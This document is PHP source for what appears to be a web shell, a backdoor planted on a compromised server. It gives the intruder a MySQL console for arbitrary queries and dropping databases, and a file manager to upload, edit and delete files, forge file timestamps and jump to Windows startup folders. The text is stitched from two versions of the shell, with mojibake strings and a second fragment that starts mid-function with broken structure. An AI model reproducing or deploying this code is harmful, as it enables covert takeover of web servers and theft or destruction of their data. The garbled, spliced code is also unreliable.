function Mysql_Msg()
{
$conn = @mysql_connect($_COOKIE['m_silichost'] . ':' . $_COOKIE['m_silicport'], $_COOKIE['m_silicuser'], $_COOKIE['m_silicpass']);
if ($conn) {
print <<<END
<script language="javascript">
function Delok(msg,gourl)
{
\tsmsg = "ȷ��Ҫɾ��[" + unescape(msg) + "]��?";
\tif(confirm(smsg)){window.location = gourl;}
}
function Createok(ac)
{
\tif(ac == 'a') document.getElementById('nsql').value = 'CREATE TABLE name (spider BLOB);';
\tif(ac == 'b') document.getElementById('nsql').value = 'CREATE DATABASE name;';
\tif(ac == 'c') document.getElementById('nsql').value = 'DROP DATABASE name;';
\treturn false;
}
</script>
END;
$BOOL = false;
$MSG_BOX = '�û�:' . $_COOKIE['m_silicuser'] . ' ��ַ:' . $_COOKIE['m_silichost'] . ':' . $_COOKIE['m_silicport'] . ' �汾:';
$k = 0;
$result = @mysql_query('select version();', $conn);
while ($row = @mysql_fetch_array($result)) {
$MSG_BOX .= $row[$k];
$k++;
}
echo '<div class="actall"> ���ݿ�:';
$result = mysql_query("SHOW DATABASES", $conn);
while ($db = mysql_fetch_array($result)) {
echo ' [<a href="?s=r&db=' . $db['Database'] . '">' . $db['Database'] . '</a>]';
}
echo '</div>';
if (isset($_GET['db'])) {
mysql_select_db($_GET['db'], $conn);
if (!empty($_POST['nsql'])) {
$BOOL = true;
$MSG_BOX = mysql_query($_POST['nsql'], $conn) ? 'ִ�гɹ�' : 'ִ��ʧ�� ' . mysql_error();
}
if (is_array($_POST['insql'])) {
$query = 'INSERT INTO ' . $_GET['table'] . ' (';
foreach ($_POST['insql'] as $var => $key) {
$querya .= $var . ',';
$queryb .= '\'' . addslashes($key) . '\',';
}
$query = $query . substr($querya, 0, -1) . ') VALUES (' . substr($queryb, 0, -1) . ');';
$MSG_BOX = mysql_query($query, $conn) ? '���ӳɹ�' : '����ʧ�� ' . mysql_error();
}
if (is_array($_POST['upsql'])) {
$query = 'UPDATE ' . $_GET['table'] . ' SET ';
foreach ($_POST['upsql'] as $var => $key) {
$queryb .= $var . '=\'' . addslashes($key) . '\',';
}
$query = $query . substr($queryb, 0, -1) . ' ' . base64_decode($_POST['wherevar']) . ';';
$MSG_BOX = mysql_query($query, $conn) ? '�ijɹ�' : '��ʧ�� ' . mysql_error();
}
if (isset($_GET['del'])) {
$result = mysql_query('SELECT * FROM ' . $_GET['table'] . ' LIMIT ' . $_GET['del'] . ', 1;', $conn);
$good = mysql_fetch_assoc($result);
$query = 'DELETE FROM ' . $_GET['table'] . ' WHERE ';
foreach ($good as $var => $key) {
$queryc .= $var . '=\'' . addslashes($key) . '\' AND ';
}
$where = $query . substr($queryc, 0, -4) . ';';
$MSG_BOX = mysql_query($where, $conn) ? 'ɾ���ɹ�' : 'ɾ��ʧ�� ' . mysql_error();
}
$action = '?s=r&db=' . $_GET['db'];
if (isset($_GET['drop'])) {
$query = 'Drop TABLE IF EXISTS ' . $_GET['drop'] . ';';
$MSG_BOX = mysql_query($query, $conn) ? 'ɾ���ɹ�' : 'ɾ��ʧ�� ' . mysql_error();
}
if (isset($_GET['table'])) {
$action .= '&table=' . $_GET['table'];
if (isset($_GET['edit'])) {
$action .= '&edit=' . $_GET['edit'];
}
}
if (isset($_GET['insert'])) {
$action .= '&insert=' . $_GET['insert'];
}
echo '<div class="actall"><form method="POST" action="' . $action . '">';
echo '<textarea name="nsql" id="nsql" style="width:500px;height:50px;">' . $_POST['nsql'] . '</textarea> ';
echo '<input type="submit" name="querysql" value="ִ��" style="width:60px;height:49px;"> ';
echo '<input type="button" value="������" style="width:60px;height:49px;" onclick="Createok(\'a\')"> ';
echo '<input type="button" value="������" style="width:60px;height:49px;" onclick="Createok(\'b\')"> ';
echo '<input type="button" value="ɾ����" style="width:60px;height:49px;" onclick="Createok(\'c\')"></form></div>';
echo '<div class="msgbox" style="height:40px;">' . $MSG_BOX . '</div><div class="actall"><a href="?s=r&db=' . $_GET['db'] . '">' . $_GET['db'] . '</a> ---> ';
if (isset($_GET['table'])) {
echo '<a href="?s=r&db=' . $_GET['db'] . '&table=' . $_GET['table'] . '">' . $_GET['table'] . '</a> ';
echo '[<a href="?s=r&db=' . $_GET['db'] . '&insert=' . $_GET['table'] . '">����</a>]</div>';
if (isset($_GET['edit'])) {
if (isset($_GET['p'])) {
$atable = $_GET['table'] . '&p=' . $_GET['p'];
} else {
$atable = $_GET['table'];
}
echo '<form method="POST" action="?s=r&db=' . $_GET['db'] . '&table=' . $atable . '">';
$result = mysql_query('SELECT * FROM ' . $_GET['table'] . ' LIMIT ' . $_GET['edit'] . ', 1;', $conn);
$good = mysql_fetch_assoc($result);
$u = 0;
foreach ($good as $var => $key) {
$queryc .= $var . '=\'' . $key . '\' AND ';
$type = @mysql_field_type($result, $u);
$len = @mysql_field_len($result, $u);
echo '<div class="actall">' . $var . ' <font color="#FF0000">' . $type . '(' . $len . ')</font><br><textarea name="upsql[' . $var . ']" style="width:600px;height:60px;">' . htmlspecialchars($key) . '</textarea></div>';
$u++;
}
$where = 'WHERE ' . substr($queryc, 0, -4);
echo '<input type="hidden" id="wherevar" name="wherevar" value="' . base64_encode($where) . '">';
echo '<div class="actall"><input type="submit" value="Update" style="width:80px;"></div></form>';
} else {
$query = 'SHOW COLUMNS FROM ' . $_GET['table'];
$result = mysql_query($query, $conn);
$fields = array();
$row_num = mysql_num_rows(mysql_query('SELECT * FROM ' . $_GET['table'], $conn));
if (!isset($_GET['p'])) {
$p = 0;
$_GET['p'] = 1;
} else {
$p = ((int) $_GET['p'] - 1) * 20;
}
echo '<table border="0"><tr>';
echo '<td class="toptd" style="width:70px;" nowrap>����</td>';
while ($row = @mysql_fetch_assoc($result)) {
array_push($fields, $row['Field']);
echo '<td class="toptd" nowrap>' . $row['Field'] . '</td>';
}
echo '</tr>';
if (eregi('WHERE|LIMIT', $_POST['nsql']) && eregi('SELECT|FROM', $_POST['nsql'])) {
$query = $_POST['nsql'];
} else {
$query = 'SELECT * FROM ' . $_GET['table'] . ' LIMIT ' . $p . ', 20;';
}
$result = mysql_query($query, $conn);
$v = $p;
while ($text = @mysql_fetch_assoc($result)) {
echo '<tr><td><a href="?s=r&db=' . $_GET['db'] . '&table=' . $_GET['table'] . '&p=' . $_GET['p'] . '&edit=' . $v . '"> �� </a> ';
echo '<a href="#" onclick="Delok(\'��\',\'?s=r&db=' . $_GET['db'] . '&table=' . $_GET['table'] . '&p=' . $_GET['p'] . '&del=' . $v . '\');return false;"> ɾ�� </a></td>';
foreach ($fields as $row) {
echo '<td>' . nl2br(htmlspecialchars(Mysql_Len($text[$row], 500))) . '</td>';
}
echo '</tr>' . "\r\n";
$v++;
}
echo '</table><div class="actall">';
for ($i = 1; $i <= ceil($row_num / 20); $i++) {
$k = (int) $_GET['p'] == $i ? '<font color="#FF0000">' . $i . '</font>' : $i;
echo '<a href="?s=r&db=' . $_GET['db'] . '&table=' . $_GET['table'] . '&p=' . $i . '">[' . $k . ']</a> ';
}
echo '</div>';
}
} elseif (isset($_GET['insert'])) {
echo '<a href="?s=r&db=' . $_GET['db'] . '&table=' . $_GET['insert'] . '">' . $_GET['insert'] . '</a></div>';
$result = mysql_query('SELECT * FROM ' . $_GET['insert'], $conn);
$fieldnum = @mysql_num_fields($result);
echo '<form method="POST" action="?s=r&db=' . $_GET['db'] . '&table=' . $_GET['insert'] . '">';
for ($i = 0; $i < $fieldnum; $i++) {
$name = @mysql_field_name($result, $i);
$type = @mysql_field_type($result, $i);
$len = @mysql_field_len($result, $i);
echo '<div class="actall">' . $name . ' <font color="#FF0000">' . $type . '(' . $len . ')</font><br><textarea name="insql[' . $name . ']" style="width:600px;height:60px;"></textarea></div>';
}
echo '<div class="actall"><input type="submit" value="Insert" style="width:80px;"></div></form>';
} else {
$query = 'SHOW TABLE STATUS';
$status = @mysql_query($query, $conn);
while ($statu = @mysql_fetch_array($status)) {
$statusize[] = $statu['Data_length'];
$statucoll[] = $statu['Collation'];
}
$query = 'SHOW TABLES FROM ' . $_GET['db'] . ';';
echo '</div><table border="0"><tr>';
echo '<td class="toptd" style="width:550px;"> ���� </td>';
echo '<td class="toptd" style="width:80px;"> ���� </td>';
echo '<td class="toptd" style="width:130px;"> �ַ��� </td>';
echo '<td class="toptd" style="width:70px;"> ��С </td></tr>';
$result = @mysql_query($query, $conn);
$k = 0;
while ($table = mysql_fetch_row($result)) {
echo '<tr><td><a href="?s=r&db=' . $_GET['db'] . '&table=' . $table[0] . '">' . $table[0] . '</a></td>';
echo '<td><a href="?s=r&db=' . $_GET['db'] . '&insert=' . $table[0] . '"> ���� </a> <a href="#" onclick="Delok(\'' . $table[0] . '\',\'?s=r&db=' . $_GET['db'] . '&drop=' . $table[0] . '\');return false;"> ɾ�� </a></td>';
echo '<td>' . $statucoll[$k] . '</td><td align="right">' . File_Size($statusize[$k]) . '</td></tr>' . "\r\n";
$k++;
}
echo '</table>';
}
}
} else {
die('����MYSQLʧ��,�����µ�½.<meta http-equiv="refresh" content="0;URL=?s=o">');
}
if (!$BOOL) {
echo '<script type="text/javascript">document.getElementById(\'nsql\').value = \'' . addslashes($query) . '\';</script>';
}
return false;
}
$statusize[] = $statu['Data_length'];
$statucoll[] = $statu['Collation'];
}
$query = 'SHOW TABLES FROM ' . $_GET['db'] . ';';
echo '</div><table border="0"><tr>';
echo '<td class="toptd" style="width:550px;"> 表名 </td>';
echo '<td class="toptd" style="width:80px;"> 操作 </td>';
echo '<td class="toptd" style="width:130px;"> 字符集 </td>';
echo '<td class="toptd" style="width:70px;"> 大小 </td></tr>';
$result = @mysql_query($query, $conn);
$k = 0;
while ($table = mysql_fetch_row($result)) {
$charset = substr($statucoll[$k], 0, strpos($statucoll[$k], '_'));
echo '<tr><td><a href="?eanver=mysql_msg&db=' . $_GET['db'] . '&table=' . $table[0] . '">' . $table[0] . '</a></td>';
echo '<td><a href="?eanver=mysql_msg&db=' . $_GET['db'] . '&insert=' . $table[0] . '"> 插入 </a> <a href="#" onclick="Delok(\'' . $table[0] . '\',\'?eanver=mysql_msg&db=' . $_GET['db'] . '&drop=' . $table[0] . '\');return false;"> 删除 </a></td>';
echo '<td>' . $statucoll[$k] . '</td><td align="right">' . File_Size($statusize[$k]) . '</td></tr>' . "\r\n";
$k++;
}
echo '</table>';
}
}
} else {
die('连接MYSQL失败,请重新登陆.<meta http-equiv="refresh" content="0;URL=?eanver=mysql_exec">');
}
if (!$BOOL and addslashes($query) != '') {
echo '<script type="text/javascript">document.getElementById(\'nsql\').value = \'' . addslashes($query) . '\';</script>';
}
break;
default:
html_main($path, $shellname);
break;
function File_a($p)
{
$MSG_BOX = 'waiting for message queue......';
if (!$_SERVER['SERVER_NAME']) {
$GETURL = '';
} else {
$GETURL = 'http://' . $_SERVER['SERVER_NAME'] . '/';
}
$UP_DIR = urlencode(File_Str($p . '/..'));
$REAL_DIR = File_Str(realpath($p));
$FILE_DIR = File_Str(dirname(__FILE__));
$ROOT_DIR = File_Mode();
$THIS_DIR = urlencode(File_Str($p));
$UP_DIR = urlencode(File_Str(dirname($p)));
$NUM_D = 0;
$NUM_F = 0;
if (!empty($_POST['pfn'])) {
$intime = @strtotime($_POST['mtime']);
$MSG_BOX = File_Write($_POST['pfn'], $_POST['pfc'], 'wb') ? 'edit file ' . $_POST['pfn'] . ' success' : 'edit file ' . $_POST['pfn'] . ' faild';
@touch($_POST['pfn'], $intime);
}
if (!empty($_POST['ufs'])) {
if ($_POST['ufn'] != '') {
$upfilename = $_POST['ufn'];
} else {
$upfilename = $_FILES['ufp']['name'];
}
$MSG_BOX = File_Up($_FILES['ufp']['tmp_name'], File_Str($p . '/' . $upfilename)) ? 'upfile ' . $upfilename . ' success' : 'upfile ' . $upfilename . ' 失败';
}
if (!empty($_POST['actall'])) {
$MSG_BOX = File_Act($_POST['files'], $_POST['actall'], $_POST['inver']);
}
if (!empty($_GET['mn'])) {
$MSG_BOX = @rename(File_Str($p . '/' . $_GET['mn']), File_Str($p . '/' . $_GET['rn'])) ? 'rename ' . $_GET['mn'] . ' to ' . $_GET['rn'] . ' success' : 'rename ' . $_GET['mn'] . ' to ' . $_GET['rn'] . ' faild';
}
if (!empty($_GET['dn'])) {
$MSG_BOX = @mkdir(File_Str($p . '/' . $_GET['dn']), 0777) ? 'create folder ' . $_GET['dn'] . ' success' : 'create folder ' . $_GET['dn'] . ' faild';
}
if (!empty($_GET['dd'])) {
$MSG_BOX = File_Deltree($_GET['dd']) ? 'del folder ' . $_GET['dd'] . ' success' : 'del folder ' . $_GET['dd'] . ' faild';
}
if (!empty($_GET['df'])) {
if (!File_Down($_GET['df'])) {
$MSG_BOX = 'the download file does not exists';
}
}
Root_CSS();
print <<<END
<script type="text/javascript">
\tfunction Inputok(msg,gourl)
\t{
\t\tsmsg = "current file:[" + msg + "]";
\t\tre = prompt(smsg,unescape(msg));
\t\tif(re)
\t\t{
\t\t\tvar url = gourl + escape(re);
\t\t\twindow.location = url;
\t\t}
\t}
\tfunction Delok(msg,gourl)
\t{
\t\tsmsg = "sure for del [" + unescape(msg) + "] ?";
\t\tif(confirm(smsg))
\t\t{
\t\t\tif(gourl == 'b'){document.getElementById('actall').value = escape(gourl);document.getElementById('fileall').submit();}
\t\t\telse window.location = gourl;
\t\t}
\t}
\tfunction CheckDate(msg,gourl)
\t{
\t\tsmsg = "current file time:[" + msg + "]";
\t\tre = prompt(smsg,msg);
\t\tif(re)
\t\t{
\t\t\tvar url = gourl + re;
\t\t\tvar reg = /^(\\d{1,4})(-|\\/)(\\d{1,2})\\2(\\d{1,2}) (\\d{1,2}):(\\d{1,2}):(\\d{1,2})\$/;
\t\t\tvar r = re.match(reg);
\t\t\tif(r==null){alert('time error!format:yyyy-mm-dd hh:mm:ss');return false;}
\t\t\telse{document.getElementById('actall').value = gourl; document.getElementById('inver').value = re; document.getElementById('fileall').submit();}
\t\t}
\t}
\tfunction CheckAll(form)
\t{
\t\tfor(var i=0;i<form.elements.length;i++)
\t\t{
\t\t\tvar e = form.elements[i];
\t\t\tif (e.name != 'chkall')
\t\t\te.checked = form.chkall.checked;
\t\t}
\t}
\tfunction SubmitUrl(msg,txt,actid)
\t{
\t\tre = prompt(msg,unescape(txt));
\t\tif(re)
\t\t{
\t\t\tdocument.getElementById('actall').value = actid;
\t\t\tdocument.getElementById('inver').value = escape(re);
\t\t\tdocument.getElementById('fileall').submit();
\t\t}
\t}
</script>
\t<div id="msgbox" class="msgbox">{$MSG_BOX}</div>
\t<div class="actall" style="text-align:center;padding:3px;">
\t<form method="GET"><input type="hidden" name="s" value="a">
\t<input type="text" name="p" value="{$p}" style="width:50%;height:22px;">
\t<select onchange="location.href='?s=a&p='+options[selectedIndex].value">
\t<option>---some folder---</option>
\t<option value="{$ROOT_DIR}"> site root folder </option>
\t<option value="{$FILE_DIR}"> current folder </option>
\t<option value="C:/Documents and Settings/All Users/「开始」菜单/程序/启动"> start item (cn) </option>
\t<option value="C:/Documents and Settings/All Users/Start Menu/Programs/Startup"> start item (en) </option>
\t<option value="C:/RECYCLER"> RECYCLER </option>
\t<option value="C:/Program Files"> Program Files </option>
\t</select> <input class="bt" type="submit" value="jump"></form>
\t<div style="margin-top:3px;"></div>
\t<form method="POST" action="?s=a&p={$THIS_DIR}" enctype="multipart/form-data">
\t<input class="bt" type="button" value="Create File" onclick="Inputok('newfile.php','?s=p&fp={$THIS_DIR}&fn=');">
\t<input class="bt" type="button" value="Create Folder" onclick="Inputok('newdir','?s=a&p={$THIS_DIR}&dn=');">
\t<input type="file" name="ufp" style="width:30%;height:22px;">
\t<input type="text" name="ufn" style="width:20%;height:22px;">
\t<input class="bt" type="submit" name="ufs" value="upfile">
\t</form>
\t</div>
\t<form method="POST" id="fileall" action="?s=a&p={$THIS_DIR}">
\t<table border="0"><tr>
\t<td class="toptd" style="width:810px;"> <a href="?s=a&p={$UP_DIR}"><b>parent directory</b></a> </td>
\t<td class="toptd" style="width:100px;"> opertion </td>
\t<td class="toptd" style="width:60px;"> attr </td>
\t<td class="toptd" style="width:200px;"> time </td>
\t<td class="toptd" style="width:100px;"> size </td></tr>
END;
if (($h_d = @opendir($p)) == NULL) {
return false;
}
while (false !== ($Filename = @readdir($h_d))) {
if ($Filename == '.' or $Filename == '..') {
continue;
}
$Filepath = File_Str($p . '/' . $Filename);
if (is_dir($Filepath)) {
$Fileperm = substr(base_convert(@fileperms($Filepath), 10, 8), -4);
$Filetime = @date('Y-m-d H:i:s', @filemtime($Filepath));
$Filepath = urlencode($Filepath);
echo "\n" . '<tr><td><a href="?s=a&p=' . $Filepath . '"><font face="wingdings" size="3">0</font><b>' . $Filename . '</b></a></td>';
$Filename = urlencode($Filename);
echo '<td><a href="#" onclick="Delok(\'' . $Filename . '\',\'?s=a&p=' . $THIS_DIR . '&dd=' . $Filename . '\');return false;">Del</a> ';
echo '<a href="#" onclick="Inputok(\'' . $Filename . '\',\'?s=a&p=' . $THIS_DIR . '&mn=' . $Filename . '&rn=\');return false;">Rename</a></td>';
echo '<td><a href="#" onclick="Inputok(\'' . $Fileperm . '\',\'?s=a&p=' . $THIS_DIR . '&mk=' . $Filename . '&md=\');return false;">' . $Fileperm . '</a></td>';
echo '<td>' . $Filetime . '</td> ';
echo '<td> </td></tr>' . "\n";
$NUM_D++;
}
}
@rewinddir($h_d);
while (false !== ($Filename = @readdir($h_d))) {
if ($Filename == '.' or $Filename == '..') {
continue;
}
$Filepath = File_Str($REAL_DIR . '/' . $Filename);
if (!is_dir($Filepath)) {
$Fileurls = str_replace(File_Str($ROOT_DIR . '/'), $GETURL, $Filepath);
$Fileperm = substr(base_convert(@fileperms($Filepath), 10, 8), -4);
$Filetime = @date('Y-m-d H:i:s', @filemtime($Filepath));
$Filesize = File_Size(@filesize($Filepath));
if ($Filepath == File_Str(__FILE__)) {
$fname = '<font color="#FF0000">' . $Filename . '</font>';
} else {
$fname = $Filename;
}
echo "\r\n" . ' <tr><td> <input type="checkbox" name="files[]" value="' . urlencode($Filepath) . '"><a target="_blank" href="' . $Fileurls . '">' . $fname . '</a> </td>';
$Filepath = urlencode($Filepath);
$Filename = urlencode($Filename);
echo ' <td> <a href="?s=p&fp=' . $THIS_DIR . '&fn=' . $Filename . '"> Edit </a> ';
echo ' <a href="#" onclick="Inputok(\'' . $Filename . '\',\'?s=a&p=' . $THIS_DIR . '&mn=' . $Filename . '&rn=\');return false;"> Rename </a> </td>';
echo ' <td>' . $Fileperm . '</td> ';
echo ' <td>' . $Filetime . '</td> ';
echo ' <td align="right"> <a href="?s=a&df=' . $Filepath . '">' . $Filesize . '</a> </td></tr> ' . "\r\n";
$NUM_F++;
}
}
@closedir($h_d);
print <<<END
</table>
<div class="actall"><input type="hidden" name="actall" value="undefined">
<input type="hidden" name="inver" value="undefined">
<input name="chkall" value="on" type="checkbox" onclick="CheckAll(this.form);">
<input class="bt" type="button" value="Copy" onclick="SubmitUrl('copy selected files to folder: ','{$THIS_DIR}','a');return false;">
<input class="bt" type="button" value="Del" onclick="Delok('selected files','b');return false;">
<input class="bt" type="button" value="Attr" onclick="SubmitUrl('change selected files attr value: ','0666','c');return false;">
<input class="bt" type="button" value="Time" onclick="CheckDate('2010-04-21 17:31:20','d');return false;">
folders({$NUM_D}) / files({$NUM_F})</div>
</form>
END;
return true;
}